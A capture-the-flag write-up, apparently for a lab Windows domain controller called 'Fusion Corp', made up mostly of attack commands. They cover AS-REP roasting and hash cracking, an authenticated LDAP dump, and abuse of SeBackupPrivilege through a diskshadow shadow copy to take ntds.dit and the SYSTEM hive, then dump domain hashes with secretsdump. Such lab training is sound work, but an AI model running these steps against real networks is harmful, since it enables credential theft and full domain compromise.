Fusion Corp
AS-REP Roasting - Authenticated LDAP Domain Dump - SeBackupPrivilege and SeRestorePrivilege abuse
Scanning
Starting off with the nmap scan
sudo nmap 10.10.75.130 -sS -sV -p-
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-20 13:33:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Initial Foothold - 1
Finding Usernames
./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d fusion.corp --dc 10.10.7.24 -v | grep 'VALID USERNAME:'

Let's try some AS-REP roasting attacks using impacket-GetNPUsers module
python2 GetNPUsers.py <Domain>/ -usersfile <File> -format hashcat -outputfile <File>

Viewing the output file

Let's now crack it via hashcat
hashcat -m 18200 -a 0 asrep-hashes /usr/share/wordlists/rockyou.txt

We are then able to utilize the credentials against port 5985 with Evil-WinRM
evil-winrm -i 10.10.22.38 -u lparker -p '<Password>'

Initial Foothold - 2
As port 80 was open I used “dirb” command to see if there was some useful folder. So I found “backup” folder in which there was a file named “employees.ods”

I downloaded and open it. It contains a users table

Now we can utilize the AS-REP roasting attack and move forward !
Lateral Move - 1
Viewing the jmurphy user's comment reveals us the password of the respective user
net user jmurphy

Lateral Move - 2
After obtaining the lparker's credentials we can perform an authenticated LDAP Domain dump which in return gives us the data in .json files
ldapdomaindump 10.10.137.66 -u 'fusion.corp\lparker' -p '!!<REDACTED>'
Got many files including one interesting file (domain_users.html) which contains users SAM Name and in one user (jmurphy) there was his password !
Privilege Escalation - 1
Querying out whoami /priv
returns us

As we can see we have SeBackupPrivilege
enabled ! - So how do we abuse it ?
This privilege grants us the ability to create backups of files on the system - A high value file would be the ntds.dit file which is a database of hashes for domain objects / users
As the ntds.dit file is in constant use we will be unable to create a backup using normal methods as the system will lock the file
Instead we can create a Distributed Shell File (DSH) - This file will contain the appropriate commands for us to run the diskshadow.exe
utility against the C: drive and ultimately the ntds.dit file
Create a
viper.dsh
file on the attacker's machine with the following contents
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
Once completed use the command unix2dos
to convert the file to DOS format
unix2dos viper.dsh
Then on the target system create a directory called 'temp' in c:\temp
- After this upload the viper.dsh
file

diskshadow /s viper.dsh

robocopy /b x:\windows\ntds . ntds.dit

From here we need to extract the SYSTEM hive which will be required for extracting the hashes
reg save hklm\system c:\Temp\system

Download the files on your attacker's machine now
download ntds.dit
download system
Now use the secretsdump to extract the hashes !
python2 secretsdump.py -ntds ntds.dit -system system local

We can now evil-winrm or psexec into the box as Administrator :)
Privilege Escalation - 2
Running whoami /privs I saw that jmurphy has SeBackupPrivilege and SeRestorePrivilege enabled
Copy the .dlls onto the victim's machine and import them
Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeUtils.dll
Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeCmdLets.dll
We can now abuse it and get the Administrator's flag but not the shell !
Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\flag.txt C:\Users\jmurphy\Documents\flag.txt
Last updated